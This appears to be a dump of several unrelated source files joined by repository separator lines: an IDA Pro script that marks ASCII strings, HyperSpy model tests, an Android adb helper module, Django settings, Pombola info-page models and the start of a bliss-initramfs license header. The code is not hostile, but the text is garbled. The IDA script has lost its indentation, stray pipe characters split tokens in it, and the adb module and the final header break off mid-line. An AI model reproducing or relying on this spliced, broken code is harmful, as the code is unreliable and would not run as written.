# Copyright 2017 The Johns Hopkins University Applied Physics Laboratory LLC
# All rights reserved.
# Permission is hereby granted, free of charge, to any person obtaining a copy of this
# software and associated documentation files (the "Software"), to deal in the Software
# without restriction, including without limitation the rights to use, copy, modify,
# merge, publish, distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,
# INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR
# PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE
# OR OTHER DEALINGS IN THE SOFTWARE.
##############################################################################################
# make_strings.py
# Searches the user entered address range for a series of ASCII bytes to define as strings.
# If the continuous series of ASCII bytes has a length greater or equal to minimum_length and
# ends with a character in string_end, the scripts undefines the bytes in the series
# and attempts to define it as a string.
#
# Input: start_addr: Start address for range to search for strings
# end_addr: End address for range to search for strings
#
##############################################################################################
################### USER DEFINED VALUES ###################
min_length = 5 # Minimum number of characters needed to define a string
string_end = [0x00] # Possible "ending characters" for strings. A string will not be
# defined if it does not end with one of these characters
###########################################################
start_addr = AskAddr(MinEA(), "Please enter the starting address for the data to be analyzed.")
end_addr = AskAddr(MaxEA(), "Please enter the ending address for the data to be analyzed.")
if ((start_addr is not None and end_addr is not None) and (start_addr != BADADDR and end_addr != BADADDR) and start_addr < end_addr):
string_start = start_addr
print "[make_strings.py] STARTING. Attempting to make strings with a minimum length of %d on data in range 0x%x to 0x%x" % (min_length, start_addr, end_addr)
num_strings = 0;
while string_start < end_addr:
num_chars = 0
curr_addr = string_start
while curr_addr < end_addr:
byte = Byte(curr_addr)
if ((byte < 0x7F and byte > 0x1F) or byte in (0x9, 0xD, 0xA)): # Determine if a byte is a "character" based on this ASCII range
num_chars += 1
curr_addr += 1
else:
if ((byte in string_end) and (num_chars >= min_length)):
MakeUnknown(string_start, curr_addr - string_start, DOUNK_SIMPLE)
if (MakeStr(string_start, curr_addr) == 1):
print "[make_strings.py] String created at 0x%x to 0x%x" % (string_start, curr_addr)
num_strings += 1
string_start = curr_addr
break
else:
print "[make_strings.py] String create FAILED at 0x%x to 0x%x" % (string_start, curr_addr)
break
else:
# String does not end with one of the defined "ending char | acters", does not meet the minimum string length, or is not an ASCII character
break
string_start += 1
print "[make_strings.py] FINISHED. Created %d strings in range 0x%x to 0x%x" % (num_strings, | start_addr, end_addr)
else:
print "[make_strings.py] QUITTING. Entered address values not valid." |
dnjohnstone/hyperspy | hyperspy/tests/model/test_set_parameter_state.py | Python | gpl-3.0 | 4,051 | 0 | # -*- coding: utf-8 -*-
# Copyright 2007-2020 The HyperSpy developers
#
# This file is part of HyperSpy.
#
# HyperSpy is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# HyperSpy is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with HyperSpy. If not, see <http://www.gnu.org/licenses/>.
import numpy as np
from hyperspy._signals.signal1d import Signal1D
from hyperspy.components1d import Gaussian
class TestSetParameterInModel:
    """Exercise ``Model.set_parameters_free``/``set_parameters_not_free``.

    Builds a model holding three identical Gaussian components so that
    per-component and per-parameter-name filtering is observable.

    Note: two lines of this block were corrupted by stray ``|``
    separator artifacts; the method name and ``g1`` assignment have
    been reconstructed from the parallel sibling tests.
    """

    def setup_method(self, method):
        # Three components appended in order; tests refer to them by name.
        g1 = Gaussian()
        g2 = Gaussian()
        g3 = Gaussian()
        s = Signal1D(np.arange(10))
        m = s.create_model()
        m.append(g1)
        m.append(g2)
        m.append(g3)
        self.g1 = g1
        self.g2 = g2
        self.g3 = g3
        self.model = m

    def test_set_parameter_in_model_not_free(self):
        """With no filters, every parameter of every component is frozen."""
        m = self.model
        g1 = self.g1
        g2 = self.g2
        g3 = self.g3
        m.set_parameters_not_free()
        assert len(g1.free_parameters) == 0
        assert len(g2.free_parameters) == 0
        assert len(g3.free_parameters) == 0

    def test_set_parameter_in_model_free(self):
        """With no filters, previously frozen parameters are all released."""
        m = self.model
        g1 = self.g1
        g2 = self.g2
        g3 = self.g3
        g1.A.free = False
        g2.sigma.free = False
        g3.centre.free = False
        m.set_parameters_free()
        assert len(g1.free_parameters) == len(g1.parameters)
        assert len(g2.free_parameters) == len(g2.parameters)
        assert len(g3.free_parameters) == len(g3.parameters)

    def test_set_parameter_in_model1(self):
        """A component list restricts freezing to the listed components."""
        m = self.model
        g1 = self.g1
        g2 = self.g2
        g3 = self.g3
        m.set_parameters_not_free([g1, g2])
        assert len(g1.free_parameters) == 0
        assert len(g2.free_parameters) == 0
        assert len(g3.free_parameters) == len(g3.parameters)

    def test_set_parameter_in_model2(self):
        """Freeing a single component leaves the others frozen."""
        m = self.model
        g1 = self.g1
        g2 = self.g2
        g3 = self.g3
        m.set_parameters_not_free()
        m.set_parameters_free([g3])
        assert len(g1.free_parameters) == 0
        assert len(g2.free_parameters) == 0
        assert len(g3.free_parameters) == len(g3.parameters)

    def test_set_parameter_in_model3(self):
        """A parameter-name filter freezes only that parameter everywhere."""
        m = self.model
        g1 = self.g1
        g2 = self.g2
        g3 = self.g3
        m.set_parameters_not_free(parameter_name_list=['A'])
        assert not g1.A.free
        assert g1.sigma.free
        assert g1.centre.free
        assert not g2.A.free
        assert g2.sigma.free
        assert g2.centre.free
        assert not g3.A.free
        assert g3.sigma.free
        assert g3.centre.free

    def test_set_parameter_in_model4(self):
        """Component and name filters combine: only g2.A is frozen."""
        m = self.model
        g1 = self.g1
        g2 = self.g2
        g3 = self.g3
        m.set_parameters_not_free([g2], parameter_name_list=['A'])
        assert g1.A.free
        assert g1.sigma.free
        assert g1.centre.free
        assert not g2.A.free
        assert g2.sigma.free
        assert g2.centre.free
        assert g3.A.free
        assert g3.sigma.free
        assert g3.centre.free

    def test_set_parameter_in_model5(self):
        """Only the named parameter of the named component is released."""
        m = self.model
        g1 = self.g1
        g2 = self.g2
        g3 = self.g3
        m.set_parameters_not_free()
        m.set_parameters_free([g1], parameter_name_list=['centre'])
        assert not g1.A.free
        assert not g1.sigma.free
        assert g1.centre.free
        assert not g2.A.free
        assert not g2.sigma.free
        assert not g2.centre.free
        assert not g3.A.free
        assert not g3.sigma.free
        assert not g3.centre.free
|
samini/gort-public | Source/Squiddy/src/tema-android-adapter-3.2-sma/AndroidAdapter/adbcommands.py | Python | apache-2.0 | 11,424 | 0.037728 | #
# Copyright 2014 Shahriyar Amini
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
__author__ = 'shahriyar'
__copyright__ = 'Copyright 2014, Shahriyar Amini'
import subprocess
import re
import AndroidAdapter.utils as utils
"""
def focusedActivity(serial_id):
try:
output = subprocess.check_output(["adb", "-s", serial_id, "shell", "dumpsys", "activity"], stderr = subprocess.PIPE)
except subprocess.CalledProcessError:
return None
outputSplit = output.split('\n')
# sample
#mFocusedActivity: HistoryRecord{408238d8 com.metago.astro/.FileManagerActivity}
for line in outputSplit:
if (line.find("mFocusedActivity") >= 0):
lineSplit = line.split(' ')
retval = lineSplit[len(lineSplit)-1].rstrip('}\r\n')
return retval
return None
"""
# returns the device time in seconds since epoch
def deviceTime(serial_id):
    """Query the device clock via ``adb shell date +%s``.

    Returns the device time as a float number of seconds since the
    epoch, or None when no serial is given or the adb call fails.
    (Reconstructed: two lines were corrupted by stray ``|`` artifacts.)
    """
    if not serial_id:
        return None
    commandArray = ["adb", "-s", serial_id, "shell", "date", '+"%s"']
    output = None
    try:
        output = subprocess.check_output(commandArray, stderr = subprocess.PIPE)
    except AttributeError:
        # Python < 2.7 lacks check_output; fall back to Popen.
        output = subprocess.Popen(commandArray, stdout = subprocess.PIPE).communicate()[0]
    except subprocess.CalledProcessError:
        pass
    if output is None:
        return None
    # NOTE(review): assumes the shell strips the quotes so the output is
    # a bare number parseable by float() -- confirm on target devices.
    return float(output)
def focusedActivity(serial_id):
    """Return the name of the activity currently holding focus, or None."""
    activities = recentActivities(serial_id)
    if not activities:
        return None
    # dict.get returns None when the key is absent, matching the
    # explicit if/else of the sibling helpers.
    return activities.get("mFocusedActivity")
def pausingActivity(serial_id):
    """Return the activity currently pausing on the device, or None.

    Thin wrapper over recentActivities(), which parses
    ``adb shell dumpsys activity`` output.
    """
    tmp = recentActivities(serial_id)
    if not tmp:
        return None
    if "mPausingActivity" in tmp:
        return tmp["mPausingActivity"]
    else:
        return None
def resumedActivity(serial_id):
    """Return the activity currently resumed on the device, or None.

    Thin wrapper over recentActivities(); mirrors pausingActivity() and
    lastPausedActivity().
    """
    tmp = recentActivities(serial_id)
    # Guard added: recentActivities() returns None when adb fails, and
    # the original `"..." in tmp` then raised TypeError. The sibling
    # helpers all have this check.
    if not tmp:
        return None
    if "mResumedActivity" in tmp:
        return tmp["mResumedActivity"]
    else:
        return None
def lastPausedActivity(serial_id):
    """Return the most recently paused activity on the device, or None.

    Thin wrapper over recentActivities().
    """
    tmp = recentActivities(serial_id)
    if not tmp:
        return None
    if "mLastPausedActivity" in tmp:
        return tmp["mLastPausedActivity"]
    else:
        return None
def recentActivities(serial_id):
    """Parse ``adb shell dumpsys activity`` into an activity-state dict.

    Returns a dict mapping the dumpsys field names (mPausingActivity,
    mResumedActivity, mFocusedActivity, mLastPausedActivity) to the
    activity name found on that line, with '/' separators removed.
    Returns None when adb fails or no field is found.
    """
    commandArray = ["adb", "-s", serial_id, "shell", "dumpsys", "activity"]
    try:
        output = subprocess.check_output(commandArray, stderr = subprocess.PIPE)
    except AttributeError:
        # Python < 2.7 lacks check_output; fall back to Popen.
        output = subprocess.Popen(commandArray, stdout = subprocess.PIPE).communicate()[0]
    except subprocess.CalledProcessError:
        return None
    outputSplit = output.split('\n')
    keys = ['mPausingActivity', 'mResumedActivity', 'mFocusedActivity', 'mLastPausedActivity']
    activities = dict()
    for line in outputSplit:
        for key in keys:
            if (line.find(key) >= 0):
                # The activity name is the last space-separated token,
                # e.g. "mFocusedActivity: HistoryRecord{... com.foo/.Bar}".
                lineSplit = line.split(' ')
                tmp = lineSplit[len(lineSplit)-1].rstrip('}\r\n')
                # remove any 'slashes'
                tmp = tmp.replace('/', '')
                activities[key] = tmp
    if (len(activities) > 0):
        return activities
    return None
# Most recent first in the list
# Running activities (most recent first):
# TaskRecord{40aa7610 #6 A com.yelp.android}
# Run #1: HistoryRecord{40a008c0 com.yelp.android/.ui.activities.ActivityHome}
# TaskRecord{4084ac80 #2 A com.android.launcher}
# Run #0: HistoryRecord{408bd8c0 com.android.launcher/com.android.launcher2.Launcher}
def runningActivities(serial_id):
    """Return the list of running activities, most recent first, or None.

    Scans ``dumpsys activity`` output from the "Running activities"
    header until the first blank line, collecting the activity name
    from each HistoryRecord line.
    """
    commandArray = ["adb", "-s", serial_id, "shell", "dumpsys", "activity"]
    try:
        output = subprocess.check_output(commandArray, stderr = subprocess.PIPE)
    except AttributeError:
        # Python < 2.7 lacks check_output; fall back to Popen.
        output = subprocess.Popen(commandArray, stdout = subprocess.PIPE).communicate()[0]
    except subprocess.CalledProcessError:
        return None
    outputSplit = output.split('\n')
    found = False
    activities = list()
    #count = 0
    for line in outputSplit:
        if not found:
            if (line.find('Running activities') >= 0):
                found = True
        else:
            tmp = line.strip(' \r\n')
            #count += 1
            #print count
            # A blank line terminates the "Running activities" section.
            if (tmp == ''):
                break
            if (tmp.find('HistoryRecord') >= 0):
                tmpSplit = tmp.split(' ')
                activities.append(tmpSplit[len(tmpSplit)-1].rstrip('}'))
    if (len(activities) > 0):
        return activities
    return None
def getProp(serial_id, prop):
    """Read an Android system property via ``adb shell getprop``.

    Returns the property value with trailing CR/LF stripped, or None
    when prop is empty, adb fails, or the output is empty.
    """
    if prop is None or prop == "":
        return None
    commandArray = ["adb", "-s", serial_id, "shell", "getprop", prop]
    output = None
    try:
        output = subprocess.check_output(commandArray, stderr = subprocess.PIPE)
    except AttributeError:
        # Python < 2.7 lacks check_output; fall back to Popen.
        output = subprocess.Popen(commandArray, stdout = subprocess.PIPE).communicate()[0]
    except subprocess.CalledProcessError:
        return None
    if output:
        return output.rstrip('\r\n')
    return None
def bootCompleted(serial_id):
    """Return True once both boot-completion properties are set."""
    # NOTE(review): relies on truthiness of the raw property string; an
    # explicit value of "0" would still be truthy. In practice these
    # properties are unset until boot finishes -- confirm on targets.
    return (bool(getProp(serial_id, "dev.bootcomplete")) and bool(getProp(serial_id, "sys.boot_completed")))
def keyboardShown(serial_id):
    """Report the soft-keyboard state from the `keyboard.status` property.

    Returns True/False when the property reads "true"/"false", and None
    when the property is unset or holds anything else.
    """
    status = getProp(serial_id, "keyboard.status")
    if not status:
        return None
    normalized = status.strip().lower()
    if normalized == "true":
        return True
    if normalized == "false":
        return False
    return None
# adb shell ps | grep com.newgt.musicbest | awk '{print $2}' | xargs adb shell kill
def processStatus(serial_id):
    """Return the raw output of ``adb shell ps``, or None on failure."""
    commandArray = ["adb", "-s", serial_id, "shell", "ps"]
    output = None
    try:
        output = subprocess.check_output(commandArray, stderr = subprocess.PIPE)
    except AttributeError:
        # Python < 2.7 lacks check_output; fall back to Popen.
        output = subprocess.Popen(commandArray, stdout = subprocess.PIPE).communicate()[0]
    except subprocess.CalledProcessError:
        return None
    if output:
        return output.rstrip('\r\n')
    return None
def processId(serial_id, packageName):
    """Return the pid of the device process matching packageName.

    Scans ``adb shell ps`` output case-insensitively; returns None when
    packageName is empty or no line matches.
    """
    if packageName is None or packageName == "":
        return None
    packageName = packageName.strip().lower()
    psOutput = processStatus(serial_id)
    psOutputSplit = psOutput.split('\n')
    processInfo = None
    pid = None
    # NOTE(review): substring match, so "com.foo" also matches
    # "com.foo.bar"; find() > 0 assumes the name never starts a line
    # (ps prints the user column first). When several lines match, the
    # last match wins. Confirm these are acceptable.
    for process in psOutputSplit:
        process = process.rstrip('\r\n').lower()
        if (process.find(packageName) > 0):
            # sample process
            # u0_a69 5631 88 316884 48312 ffffffff 40072a40 s com.newgt.musicbest
            processInfo = process
            # Collapse whitespace runs so the pid is always field 1.
            processInfo = re.sub(r'\s+', ' ', processInfo)
            processInfoSplit = processInfo.split(' ')
            pid = int(processInfoSplit[1])
    return pid
def killProcess(serial_id, pid=None, packageName=None):
    """Kill a device process by pid, or by package name when pid is None.

    Returns the ``adb shell kill`` exit status, or None when neither a
    pid nor a resolvable package name was given.
    """
    if (pid is None and packageName is None):
        return None
    # Resolve the pid from the package name when not supplied directly.
    # (Fixed: the original compared with `== None` instead of the
    # identity check `is None`.)
    if pid is None:
        pid = processId(serial_id, packageName)
    # processId may fail to find a matching process.
    if pid is None:
        return None
    return subprocess.call(["adb", "-s", serial_id, "shell", "kill", str(pid)])
def forceStop(serial_id, packageName):
    """Force-stop an app via ``am force-stop``, falling back to kill.

    Returns True on success, False when five kill attempts still leave
    the process running. (Python 2 module: print statements.)
    """
    stdout = subprocess.Popen(["adb", "-s", serial_id, "shell", "am", "force-stop", packageName], stdout=subprocess.PIPE).communicate()[0]
    # Empty output means `am` reported no error.
    if stdout == '':
        print "force stop succeed"
        return True
    else:
        # Retry by killing the pid directly, up to five times.
        for cnt in range(5):
            ret = killProcess(serial_id, None, packageName)
            utils.wait(1)
            # killProcess returns None when no pid is found any more,
            # i.e. the process is gone.
            if ret == None:
                print "force stop succeed"
                return True
        print "force stop 5 times"
        return False
def killADB():
    """Force-kill every adb process on the host via pkill.

    Returns pkill's captured output, or None when pkill exits non-zero.
    """
    command = ["pkill", "-9", "-f", "adb"]
    try:
        return subprocess.check_output(command, stderr = subprocess.PIPE)
    except AttributeError:
        # Python < 2.7 lacks check_output; fall back to Popen.
        return subprocess.Popen(command, stdout = subprocess.PIPE).communicate()[0]
    except subprocess.CalledProcessError:
        return None
def startADB():
    """Start the host adb server; returns its output or None on failure."""
    commandArray = ["adb", "start-server"]
    output = None
    try:
        output = subprocess.check_output(commandArray, stderr = subprocess.PIPE)
    except AttributeError:
        # Python < 2.7 lacks check_output; fall back to Popen.
        output = subprocess.Popen(commandArray, stdout = subprocess.PIPE).communicate()[0]
    except subprocess.CalledProcessError:
        return None
    return output
def restartADB():
    """Restart the host adb server (kill, then start)."""
    killADB()
    startADB()
def taintLog( |
sinnwerkstatt/landmatrix | config/settings/base.py | Python | agpl-3.0 | 7,018 | 0.000428 | import sys
import environ
from django.utils.translation import ugettext_lazy as _
BASE_DIR = environ.Path(__file__) - 3 # type: environ.Path
env = environ.Env()
env.read_env(BASE_DIR(".env"))
LANGUAGE_CODE = "en"
LANGUAGES = [("en", _("English")), ("es", _("Español")), ("fr", _("Français"))]
TIME_ZONE = "Europe/Berlin"
USE_I18N = True
USE_L10N = True
USE_TZ = True
SITE_ID = 1
ROOT_URLCONF = "config.urls"
WSGI_APPLICATION = "config.wsgi.application"
EMAIL_CONFIG = env.email_url("DJANGO_EMAIL_URL", default="consolemail://")
vars().update(EMAIL_CONFIG)
SERVER_EMAIL = EMAIL_CONFIG["EMAIL_HOST_USER"]
DEFAULT_FROM_EMAIL = SERVER_EMAIL
DATABASES = {"default": env.db("DATABASE_URL")}
INSTALLED_APPS = [
"django.contrib.auth",
"django.contrib.contenttypes",
"django.contrib.sessions",
"django.contrib.messages",
"django.contrib.staticfiles",
"django.contrib.humanize",
"django.contrib.postgres",
"wagtail_modeltranslation",
"wagtail_modeltranslation.makemigrations",
"wagtail_modeltranslation.migrate",
"django.contrib.admin",
"django.contrib.sites",
# OL3 widgets must come before GIS
"apps.ol3_widgets",
"django.contrib.gis",
# wagtail and dependencies
"wagtail.contrib.modeladmin",
"wagtail.contrib.forms",
"wagtail.contrib.redirects",
"wagtail.contrib.settings",
# "wagtail.contrib.styleguide",
"wagtail.embeds",
"wagtail.sites",
"wagtail.users",
"wagtail.snippets",
"wagtail.documents",
"wagtail.images",
"wagtail.search",
"wagtail.admin",
"wagtail.core",
"wagtailorderable",
"apps.blog", # why here and not below?
"modelcluster",
"taggit",
"bootstrap3_datetime",
# 'treebeard',
"jstemplate",
"simple_history",
"crispy_forms",
"wkhtmltopdf",
"threadedcomments",
"django_comments",
"captcha",
"rest_framework",
"rest_framework.authtoken",
"rest_framework_gis",
"drf_yasg",
"django.contrib.syndication",
"file_resubmit",
# apps of the actual landmatrix project
"apps.message",
"apps.landmatrix",
"apps.grid",
"apps.map",
"apps.charts",
"apps.editor",
"apps.wagtailcms",
"apps.api",
"apps.notifications",
"apps.public_comments",
"apps.feeds",
"impersonate",
"celery",
# green new deal
"wagtail.api.v2",
"ariadne.contrib.django",
]
MIDDLEWARE = [
# "django.middleware.cache.UpdateCacheMiddleware",
"django.contrib.sessions.middleware.SessionMiddleware",
"django.middleware.locale.LocaleMiddleware",
"django.middleware.common.CommonMiddleware",
"django.middleware.csrf.CsrfViewMiddleware",
"django.contrib.auth.middleware.AuthenticationMiddleware",
"django.contrib.messages.middleware.MessageMiddleware",
"django.middleware.clickjacking.XFrameOptionsMiddleware",
"django.middleware.security.SecurityMiddleware",
# populate the history user automatically
"simple_history.middleware.HistoryRequestMiddleware",
# wagtail and dependencies
"wagtail.core.middleware.SiteMiddleware",
"wagtail.contrib.redirects.middleware.RedirectMiddleware",
"impersonate.middleware.ImpersonateMiddleware",
# "django.middleware.cache.FetchFromCacheMiddleware",
]
# Django template engine configuration: the stock Django context
# processors plus wagtailcms' data-source-dir injector.
# (Reconstructed: the messages context-processor string was split by a
# stray "|" artifact; restored to the standard dotted path.)
TEMPLATES = [
    {
        "BACKEND": "django.template.backends.django.DjangoTemplates",
        "DIRS": [BASE_DIR("templates")],
        "APP_DIRS": True,
        "OPTIONS": {
            "context_processors": [
                "django.template.context_processors.debug",
                "django.template.context_processors.request",
                "django.contrib.auth.context_processors.auth",
                "django.contrib.messages.context_processors.messages",
                "django.template.context_processors.i18n",
                "django.template.context_processors.media",
                "apps.wagtailcms.context_processors.add_data_source_dir",
            ]
        },
    }
]
LOGIN_REDIRECT_URL = "/editor/"
# Limit all uploads to 20MB, and data sources to 1MB
MAX_UPLOAD_SIZE = 20971520
DATA_SOURCE_MAX_UPLOAD_SIZE = 10485760
DATA_SOURCE_DIR = "uploads" # appended to MEDIA_ROOT/MEDIA_URL
MEDIA_ROOT = BASE_DIR("media")
MEDIA_URL = "/media/"
STATIC_ROOT = BASE_DIR("static-collected")
STATIC_URL = "/static/"
STATICFILES_FINDERS = [
"django.contrib.staticfiles.finders.FileSystemFinder",
"django.contrib.staticfiles.finders.AppDirectoriesFinder",
# 'compressor.finders.CompressorFinder',
]
STATICFILES_DIRS = [
BASE_DIR("node_modules"),
BASE_DIR("frontend", "dist"),
]
STATICFILES_STORAGE = "django.contrib.staticfiles.storage.ManifestStaticFilesStorage"
FILE_UPLOAD_PERMISSIONS = 0o644
DATA_UPLOAD_MAX_MEMORY_SIZE = 4 * 1024 * 1024 * 1024
LOCALE_PATHS = [BASE_DIR("config/locale")]
CACHES = {
"default": env.cache("DJANGO_CACHE_URL", default="dummycache://"),
"file_resubmit": {
"BACKEND": "django.core.cache.backends.filebased.FileBasedCache",
"LOCATION": "/tmp/file_resubmit/",
},
}
COMMENTS_APP = "apps.public_comments"
WAGTAIL_SITE_NAME = "Land Matrix"
MODELTRANSLATION_CUSTOM_FIELDS = ("NoWrapsStreamField",)
# Django REST Framework settings
REST_FRAMEWORK = {
"DEFAULT_AUTHENTICATION_CLASSES": (
"rest_framework.authentication.BasicAuthentication",
"rest_framework.authentication.SessionAuthentication",
)
}
IMPERSONATE = {
"REDIRECT_URL": "/editor/",
"REQUIRE_SUPERUSER": True,
"ALLOW_SUPERUSER": True,
"REDIRECT_FIELD_NAME": "next",
}
ELASTICSEARCH_URL = env("ELASTICSEARCH_URL", default="http://localhost")
try:
ELASTIC_INDEX_AB = open(".es_index_ab_switch", "r").read()
except FileNotFoundError:
open(".es_index_ab_switch", "w").write("a")
ELASTIC_INDEX_AB = "a"
ELASTICSEARCH_INDEX_BASENAME = env("ELASTICSEARCH_INDEX_NAME", default="landmatrix")
ELASTICSEARCH_INDEX_NAME = f"{ELASTICSEARCH_INDEX_BASENAME}_{ELASTIC_INDEX_AB}"
print(f"Using elasticsearch index {ELASTICSEARCH_INDEX_NAME}")
sys.stdout.flush()
# GreenNewDeal
OLD_ELASTIC = env.bool("OLD_ELASTIC", default=True)
NEW_ROUTES = env.bool("NEW_ROUTES", default=True)
# CELERY SETTINGS
BROKER_URL = "redis://localhost:6379/0"
CELERY_REDIS_BACKEND = BROKER_URL
CELERY_NAME = "landmatrix"
BLOG_LIMIT_AUTHOR_CHOICES_GROUP = "CMS Global (Editors)"
# django-registration
ACCOUNT_ACTIVATION_DAYS = 7
WKHTMLTOPDF_CMD = env("DJANGO_WKHTMLTOPDF_CMD", default="wkhtmltopdf")
ALLOWED_HOSTS = env.list("DJANGO_ALLOWED_HOSTS", default=["127.0.0.1", "localhost"])
LANDMATRIX_INVESTOR_GRAPH_ENABLED = True
TWITTER_TIMELINE = (
{
"consumer_key": env("DJANGO_TWITTER_CONSUMER_KEY"),
"consumer_secret": env("DJANGO_TWITTER_CONSUMER_SECRET"),
"access_token": env("DJANGO_TWITTER_ACCESS_TOKEN"),
"access_token_secret": env("DJANGO_TWITTER_ACCESS_TOKEN_SECRET"),
}
if env("DJANGO_TWITTER_CONSUMER_KEY", default="")
else None
)
TWITTER_DEFAULT_USERNAME = "land_matrix"
TWITTER_DEFAULT_COUNT = 5
|
hzj123/56th | pombola/info/models.py | Python | agpl-3.0 | 6,304 | 0.005235 | import datetime
import lxml
from lxml.html.clean import Cleaner
import re
from django.conf import settings
from django.db import models
from django.core.urlresolvers import reverse
from django.utils.text import slugify
from markitup.fields import MarkupField
class ModelBase(models.Model):
    """Abstract base adding created/updated timestamps to all models."""
    # NOTE(review): auto_now_add/auto_now combined with default= is
    # redundant (Django ignores the default) -- confirm before cleanup.
    created = models.DateTimeField( auto_now_add=True, default=datetime.datetime.now )
    updated = models.DateTimeField( auto_now=True, default=datetime.datetime.now )
    class Meta:
        abstract = True
class LabelModelBase(ModelBase):
    """
    The tags and categories are essentially the same thing in the database. Use
    a common model for most of the fields etc.
    """
    # Unique display name and URL slug; entries are listed alphabetically.
    name = models.CharField(max_length=300, unique=True)
    slug = models.SlugField(unique=True)
    def __unicode__(self):
        return self.name
    class Meta():
        abstract = True
        ordering = ( 'name', )
class Category(LabelModelBase):
    """A label with an optional markdown summary, shown on listing pages."""
    summary = MarkupField(blank=True)
    class Meta():
        verbose_name_plural = 'categories'
class Tag(LabelModelBase):
    """A plain label with no extra fields beyond LabelModelBase."""
    pass
class InfoPage(ModelBase):
    """
    InfoPage - store static pages in the database so they can be edited in the
    admin. Also simple blog posts.

    There are several pages on a site that are static - ie they don't change
    very often. However sometimes they need to change and it is conveniant to do
    this via the admin, rather than editing the html on disk.

    This module allows you to do that.

    Each page has a slug - which is used to identify it in the url. So for
    example if you had a site FAQ the slug might be 'faq' and its url would
    become something like http://example.com/info/faq - where 'info' is where
    these pages are stored.

    Pages also have titles - which are shown at the top of the page.

    Both slugs and titles must be unique to each page.

    The content of the page is formatted using 'markdown' - which allows you to
    include bulleted lists, headings, styling and links.

    The page with the slug 'index' is special - it is used as the index page to
    all the other info pages, and so should probably be a table of contents or
    similar.

    Pages can also be marked as 'blog' in which case they are presented in
    newest first order on the '/blog' page, and on their own blog page.

    (Reconstructed: two lines of this block were corrupted by stray "|"
    separator artifacts, in _clean_html and content_as_html.)
    """
    title = models.CharField(max_length=300, unique=True)
    slug = models.SlugField(unique=True)
    markdown_content = MarkupField(
        blank=True,
        default='',
        help_text="When linking to other pages use their slugs as the address (note that these links do not work in the preview, but will on the real site)",
    )
    raw_content = models.TextField(
        "Raw HTML",
        blank=True,
        default='',
        help_text="You can enter raw HTML into this box, and it will be used if 'Enter content as raw HTML' is selected"
    )
    use_raw = models.BooleanField(
        'Enter content as raw HTML',
        default=False,
    )
    KIND_PAGE = 'page'
    KIND_BLOG = 'blog'
    KIND_CHOICES = (
        (KIND_BLOG, 'Blog'),
        (KIND_PAGE, 'Page')
    )
    kind = models.CharField(max_length=10, choices=KIND_CHOICES, default=KIND_PAGE)
    # When was this page/post published. Could use updated or created but it
    # makes sense to make this seperate now as it will facilitate queing up
    # posts to be published in future easier.
    publication_date = models.DateTimeField( default=datetime.datetime.now )
    # Link to the categories and tags, use a custom related_name as this model
    # can represent both pages and posts.
    categories = models.ManyToManyField(Category, related_name="entries", blank=True)
    tags = models.ManyToManyField(Tag, related_name="entries", blank=True)
    def __unicode__(self):
        return self.title
    def css_class(self):
        return self._meta.module_name
    def name(self):
        return str(self)
    def _clean_html(self, html):
        # Strip <style>/<script> elements and other unsafe markup.
        cleaner = Cleaner(style=True, scripts=True)
        return cleaner.clean_html(html)
    @property
    def content_as_html(self):
        if settings.INFO_PAGES_ALLOW_RAW_HTML and self.use_raw:
            # Parsing the HTML with lxml and outputting it again
            # should ensure that we have only well-formed HTML:
            parsed = lxml.html.fromstring(self.raw_content)
            return lxml.etree.tostring(parsed, method='html')
        else:
            # Since there seems to be some doubt about whether
            # markdown's safe_mode is really safe, clean the rendered
            # HTML to remove any potentially dangerous tags first
            return self._clean_html(self.markdown_content.rendered or '')
    @property
    def content_as_cleaned_html(self):
        return self._clean_html(self.content_as_html)
    @property
    def content_as_plain_text(self):
        # Collapse all whitespace runs into single spaces.
        cleaned_html = self.content_as_cleaned_html
        cleaned_text = lxml.html.fromstring(cleaned_html).text_content()
        return re.sub(r'(?ms)\s+', ' ', cleaned_text).strip()
    def content_with_anchors(self):
        """ Returns content with an anchor tag <a> inserted above every heading element
        (the anchor name is the slugified heading text). For example:
            <h2>Halt! Who goes there?"</h2>
        becomes
            <a name="halt-who-goes-there">
            <h2>Halt! Who goes there?"</h2>"""
        def prepend_anchor_tag( match ):
            return '<a name="%s"></a>%s%s' % (slugify(match.group(2)), match.group(1), match.group(2))
        headings_regexp = re.compile( '(<h\d+[^>]*>)([^<]*)')
        return headings_regexp.sub( prepend_anchor_tag, self.content_as_html)
    @models.permalink
    def get_absolute_url(self):
        if self.kind == self.KIND_PAGE:
            url_name = 'info_page'
        elif self.kind == self.KIND_BLOG:
            url_name = 'info_blog'
        else:
            raise Exception("Unexpected kind '{0}'".format(self.kind))
        return ( url_name, [ self.slug ] )
    def get_admin_url(self):
        url = reverse(
            'admin:%s_%s_change' % ( self._meta.app_label, self._meta.module_name),
            args=[self.id]
        )
        return url
    class Meta:
        ordering = ['title']
|
fearedbliss/bliss-initramfs | pkg/hooks/Hook.py | Python | apache-2.0 | 2,523 | 0 | # Copyright (C) 2012-2020 Jonathan Vasquez <jon@xyinn.org>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http:/ | /www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
